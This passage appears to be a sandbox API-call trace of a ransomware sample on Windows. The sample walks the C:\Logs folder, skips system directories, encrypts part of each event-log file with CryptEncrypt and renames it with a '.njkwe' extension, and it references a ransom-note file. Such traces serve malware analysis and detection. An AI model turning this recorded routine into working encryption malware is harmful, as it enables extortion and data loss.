lstrcmpiW (lpString1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpString2="System Volume Information") returned -1 [0066.331] lstrcmpiW (lpString1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpString2="Program Files") returned -1 [0066.331] lstrcmpiW (lpString1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpString2="Program Files (x86)") returned -1 [0066.331] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 90 [0066.331] StrStrIW (lpFirst="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpSrch=".njkwe") returned 0x0 [0066.331] lstrcmpW (lpString1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.331] lstrcmpW (lpString1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpString2="taridd") returned -1 [0066.331] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.331] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.332] GetTickCount () returned 0x1150fac [0066.332] GetTickCount () returned 0x1150fac [0066.332] GetTickCount () returned 0x1150fac [0066.332] GetTickCount () returned 0x1150fac [0066.332] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.332] GetProcessHeap () returned 0xbe0000 [0066.332] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.332] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.334] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.334] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.335] GetProcessHeap () returned 0xbe0000 [0066.335] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.335] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.335] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.349] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.349] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.349] CloseHandle (hObject=0x428) returned 1 [0066.375] GetProcessHeap () returned 0xbe0000 [0066.375] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.375] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx_r00t_{3sXlE5}.njkwe") returned 110 [0066.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.376] GetProcessHeap () returned 0xbe0000 [0066.376] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.376] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cef47f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cef47f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", cAlternateFileName="MIA726~1.EVT")) returned 1 [0066.376] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpString2="Windows") returned -1 [0066.376] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpString2="$Recycle.bin") returned 1 [0066.376] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpString2="System Volume Information") returned -1 [0066.376] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpString2="Program Files") returned -1 [0066.376] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpString2="Program Files (x86)") returned -1 [0066.376] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 60 [0066.376] StrStrIW (lpFirst="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpSrch=".njkwe") returned 0x0 [0066.376] lstrcmpW (lpString1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.376] lstrcmpW (lpString1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpString2="taridd") returned -1 [0066.376] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.376] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.376] GetTickCount () returned 0x1150fdb [0066.376] GetTickCount () returned 0x1150fdb [0066.377] GetTickCount () returned 0x1150fdb [0066.377] GetTickCount () returned 0x1150fdb [0066.377] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.377] GetProcessHeap () returned 0xbe0000 [0066.377] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.377] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.379] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.379] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.379] GetProcessHeap () returned 0xbe0000 [0066.379] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.379] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.379] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.379] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.379] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.379] CloseHandle (hObject=0x428) returned 1 [0066.381] GetProcessHeap () returned 0xbe0000 [0066.381] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.381] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx_r00t_{3sXlE5}.njkwe") returned 80 [0066.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.382] GetProcessHeap () returned 0xbe0000 [0066.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.382] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", cAlternateFileName="MI08CB~1.EVT")) returned 1 [0066.382] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpString2="Windows") returned -1 [0066.382] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.382] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.382] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpString2="Program Files") returned -1 [0066.382] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.382] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 66 [0066.382] StrStrIW (lpFirst="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.382] lstrcmpW (lpString1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.382] lstrcmpW (lpString1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpString2="taridd") returned -1 [0066.382] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.382] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.382] GetTickCount () returned 0x1150fdb [0066.382] GetTickCount () returned 0x1150fdb [0066.382] GetTickCount () returned 0x1150fdb [0066.382] GetTickCount () returned 0x1150fdb [0066.383] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.383] GetProcessHeap () returned 0xbe0000 [0066.383] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.383] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.385] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.385] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.385] GetProcessHeap () returned 0xbe0000 [0066.385] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.385] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.385] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.385] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.385] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.385] CloseHandle (hObject=0x428) returned 1 [0066.387] GetProcessHeap () returned 0xbe0000 [0066.387] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.387] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 86 [0066.387] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.388] GetProcessHeap () returned 0xbe0000 [0066.388] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.388] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc967f17e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc967f17e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Dhcp-Client%4Admin.evtx", cAlternateFileName="MI8270~1.EVT")) returned 1 [0066.388] lstrcmpiW (lpString1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpString2="Windows") returned -1 [0066.388] lstrcmpiW (lpString1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpString2="$Recycle.bin") returned 1 [0066.388] lstrcmpiW (lpString1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpString2="System Volume Information") returned -1 [0066.388] lstrcmpiW (lpString1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpString2="Program Files") returned -1 [0066.388] lstrcmpiW (lpString1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpString2="Program Files (x86)") returned -1 [0066.388] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 53 [0066.388] StrStrIW (lpFirst="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpSrch=".njkwe") returned 0x0 [0066.388] lstrcmpW (lpString1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.388] lstrcmpW (lpString1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpString2="taridd") returned -1 [0066.388] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.388] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.388] GetTickCount () returned 0x1150fea [0066.388] GetTickCount () returned 0x1150fea [0066.388] GetTickCount () returned 0x1150fea [0066.388] GetTickCount () returned 0x1150fea [0066.388] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.388] GetProcessHeap () returned 0xbe0000 [0066.388] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.388] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.405] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.405] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.406] GetProcessHeap () returned 0xbe0000 [0066.406] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.406] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.406] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.406] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.406] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.406] CloseHandle (hObject=0x428) returned 1 [0066.408] GetProcessHeap () returned 0xbe0000 [0066.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.408] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx_r00t_{3sXlE5}.njkwe") returned 73 [0066.408] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.409] GetProcessHeap () returned 0xbe0000 [0066.409] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.409] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc96cb64b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc96cb64b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", cAlternateFileName="MIEBFF~1.EVT")) returned 1 [0066.409] lstrcmpiW (lpString1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpString2="Windows") returned -1 [0066.409] lstrcmpiW (lpString1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpString2="$Recycle.bin") returned 1 [0066.409] lstrcmpiW (lpString1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpString2="System Volume Information") returned -1 [0066.409] lstrcmpiW (lpString1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpString2="Program Files") returned -1 [0066.409] lstrcmpiW (lpString1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpString2="Program Files (x86)") returned -1 [0066.409] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 55 [0066.409] StrStrIW (lpFirst="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpSrch=".njkwe") returned 0x0 [0066.409] lstrcmpW (lpString1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.409] lstrcmpW (lpString1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpString2="taridd") returned -1 [0066.409] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.409] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.409] GetTickCount () returned 0x1150ffa [0066.409] GetTickCount () returned 0x1150ffa [0066.409] GetTickCount () returned 0x1150ffa [0066.409] GetTickCount () returned 0x1150ffa [0066.409] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.409] GetProcessHeap () returned 0xbe0000 [0066.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.410] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.412] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.412] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.412] GetProcessHeap () returned 0xbe0000 [0066.412] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: 